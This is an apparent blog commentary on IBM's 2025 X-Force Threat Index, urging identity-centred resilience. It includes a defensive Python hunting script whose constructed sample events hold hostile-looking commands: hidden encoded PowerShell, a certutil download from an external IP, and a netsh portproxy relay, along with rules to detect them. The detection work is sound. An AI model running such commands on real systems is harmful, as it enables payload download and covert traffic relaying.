IBM’s 2025 X-Force Threat Index signals a turning point in how defenders should prioritize their work. Attackers are increasingly favoring stealthy, identity-first intrusions and data theft over the noisy, file-encrypting campaigns that dominated headlines in prior years. That change is not a simple tactical pivot by adversaries. It is an operational cue that organizations must move from a prevention-only mindset toward purposeful resilience designed around identity, detection, and rapid containment.
The headline statistics are blunt and actionable. X-Force observed large increases in credential harvesting and credential-stealing email campaigns, with nearly one in three incidents involving credential theft and an 84 percent surge in infostealer delivery via email in 2024. Simultaneously, ransomware as a proportion of malware cases declined even as extortion remained a threat. Those patterns point to adversaries optimizing for quick access and fast monetization while trying to avoid detection. Defenders therefore need to assume compromise and design systems that limit attacker residence, lateral movement, and exfiltration rather than only trying to keep attackers out.
Two technical trends in the report deserve special emphasis for defense planners. First, identity abuse and the use of valid accounts are now a dominant initial access vector. X-Force found that identity-based attacks accounted for roughly 30 percent of intrusions and that nearly one in three attacks used valid accounts. This elevates the importance of authentication hygiene, session monitoring, and rapid credential revocation as primary defensive controls. Second, public-facing application exploitation and the rapid public availability of exploit code make internet-exposed services high-risk attack surfaces. Both trends favor defenders who operate continuous exposure inventories, prioritize rapid patching for externally visible assets, and remove unnecessary internet-facing services.
The report also documents a disturbing operational tradecraft shift. Adversaries are increasingly leaning on proxy malware and living-off-the-land techniques to hide in plain sight, use cloud infrastructure for command and control, and forward requests to evade network detection. These tactics complicate signature-based defenses and increase the value of behavioral telemetry, endpoint detection, and cloud workload inspection capabilities. Threat hunting that looks for abnormal account behavior, unusual command chains, or unexpected outbound proxying must become routine.
For defense contexts where cyber attacks have kinetic consequences, the implications are urgent. X-Force reported that critical infrastructure organizations represented a substantial share of incidents to which they responded. When an adversary gains access through credential theft or exploits a public-facing service, the path to operational impact is shorter in systems that blur IT and OT boundaries. That demands tailored resilience planning: multifactor authentication for operational accounts, segmented networks with enforceable access policies, and fail-safe modes that limit unsafe actions when trust is ambiguous. The goal is not zero risk. It is predictable, recoverable operations under attack.
Where should defenders invest to close the gap the X-Force index exposes? I recommend four prioritized lines of effort:
1) Harden identity and session lifecycles. Move beyond password rules to modernized authentication management. Enforce strong multi-factor authentication, use risk-based adaptive controls, instrument session behavior, and automate credential revocation. Assume credentials will be harvested and build rapid containment processes accordingly.
2) Elevate detection centered on living-off-the-land and proxy behavior. Expand telemetry across endpoints, cloud workloads, and network egress points. Use behavioral analytics and proactive hunting to find anomalous use of legitimate tools or covert proxying activity. Detection needs to be able to spot stealth, not just noise.
3) Reduce internet-facing attack surface and accelerate patching. Maintain a continuous inventory of public-facing applications and prioritize remediation of vulnerabilities that are publicly exploitable or have exploit code available. Where rapid patching is impossible, apply compensating controls such as strict access proxies and host-based restrictions.
4) Bake resilience into cyber-physical operations. For systems with kinetic effects, integrate cyber incident response with operational continuity planning. Tabletop scenarios should include credential compromise, stealthy persistence, and chained exploitation of public apps to kinetic impact. Segment control plane access and require out-of-band verification for any safety-critical changes.
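As an added illustration of the detection work item 2 calls for (and the chained-activity view item 4's tabletop scenarios depend on), the following Python hunting pass runs behavioral rules over a handful of constructed endpoint process-creation events: Office applications spawning script hosts, encoded PowerShell, certutil used as a downloader, and netsh portproxy turning a host into a covert relay. This is example code written for this post, not tooling from IBM X-Force or the report; the event schema, host names, user names, and rule names are assumptions, and the sample events are constructed rather than real telemetry.

```python
"""Toy threat-hunting pass over constructed endpoint process-creation events.

Flags anomalous use of legitimate tools (living-off-the-land) and covert
port-proxying, then groups hits per host so chained activity stands out.
Every event below is constructed for this example, not real telemetry.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

# Constructed sample events (assumed schema: one row per process creation).
SAMPLE_EVENTS = [
    {"ts": "2025-03-01T09:14:02Z", "host": "ws-017", "user": "jdoe",
     "parent": "explorer.exe", "image": "winword.exe",
     "cmdline": "winword.exe report.docx"},
    {"ts": "2025-03-01T09:14:40Z", "host": "ws-017", "user": "jdoe",
     "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ts": "2025-03-01T09:15:03Z", "host": "ws-017", "user": "jdoe",
     "parent": "powershell.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7/u.txt u.txt"},
    {"ts": "2025-03-01T11:02:11Z", "host": "srv-db-02", "user": "svc_backup",
     "parent": "cmd.exe", "image": "netsh.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=8443 "
                "connectaddress=10.0.5.20 connectport=3389"},
    {"ts": "2025-03-01T11:30:00Z", "host": "ws-042", "user": "pki-admin",
     "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -verify server.cer"},   # legitimate certutil use
    {"ts": "2025-03-01T11:31:00Z", "host": "ws-042", "user": "SYSTEM",
     "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    user: str
    ts: str
    cmdline: str


def check_event(ev: dict) -> list[str]:
    """Return the names of every hunting rule this single event matches."""
    image, parent = ev["image"].lower(), ev["parent"].lower()
    toks = ev["cmdline"].lower().split()
    hits: list[str] = []
    # A document handler spawning a script host is the classic phishing foothold.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_shell")
    # Encoded PowerShell hides intent from casual command-line review.
    if image in {"powershell.exe", "pwsh.exe"} and any(
            t in ("-enc", "-encodedcommand", "-e") for t in toks):
        hits.append("encoded_powershell")
    # certutil pulling from a URL is a download, not certificate work.
    if (image == "certutil.exe" and "-urlcache" in toks
            and any(t.startswith("http") for t in toks)):
        hits.append("lolbin_download")
    # netsh portproxy "add" makes the host relay traffic for someone else.
    if image == "netsh.exe" and "portproxy" in toks and "add" in toks:
        hits.append("covert_port_proxy")
    return hits


def hunt(events: list[dict]) -> list[Finding]:
    """Run every rule over every event and collect the findings in order."""
    return [Finding(rule, ev["host"], ev["user"], ev["ts"], ev["cmdline"])
            for ev in events for rule in check_event(ev)]


def triage(findings: list[Finding]) -> dict[str, list[str]]:
    """Distinct rules hit per host, in first-seen order."""
    per_host: dict[str, list[str]] = defaultdict(list)
    for f in findings:
        if f.rule not in per_host[f.host]:
            per_host[f.host].append(f.rule)
    return dict(per_host)


def chained_hosts(findings: list[Finding]) -> list[str]:
    """Hosts where two or more different rules fired: likely a chain, not noise."""
    return sorted(h for h, rules in triage(findings).items() if len(rules) >= 2)


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.ts} {f.host:<10} {f.user:<11} {f.rule:<22} {f.cmdline}")
    print("chained:", chained_hosts(found))
```

The rules are deliberately coarse string matches so the structure stays readable; in production they would sit in a SIEM or EDR rule language with allow-lists for known administrative jobs (the benign `certutil -verify` event above passes untouched). The per-host grouping is the part worth keeping: a single encoded PowerShell launch is an alert, but the same host then pulling a file with certutil is a chain, and that is the pattern the living-off-the-land tradecraft is designed to hide.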
A forward-looking point worth calling out is AI-related attack surface expansion. X-Force noted emerging vulnerabilities in AI frameworks and MLOps platforms as organizations scale generative AI and automation. Those platforms introduce new assets to inventory and new supply chain dependencies that can be abused by adversaries. Protecting model training pipelines, secrets used in MLOps, and the integrity of inference hosts should be part of any resilience plan that anticipates hybrid cyber-kinetic consequences.
The shift the X-Force index describes is already underway. Attackers are choosing stealth and speed. Defenders must choose resilience and deliberate containment. That means investing in identity controls, telemetry-driven detection, rigorous exposure management, and operations-aware incident playbooks. For organizations responsible for systems that tie digital compromise to physical outcomes, the time to build those capabilities is now. The window between initial access and real-world impact is shrinking. Resilience is the only practical strategy to keep critical systems safe under persistent, identity-first threat models.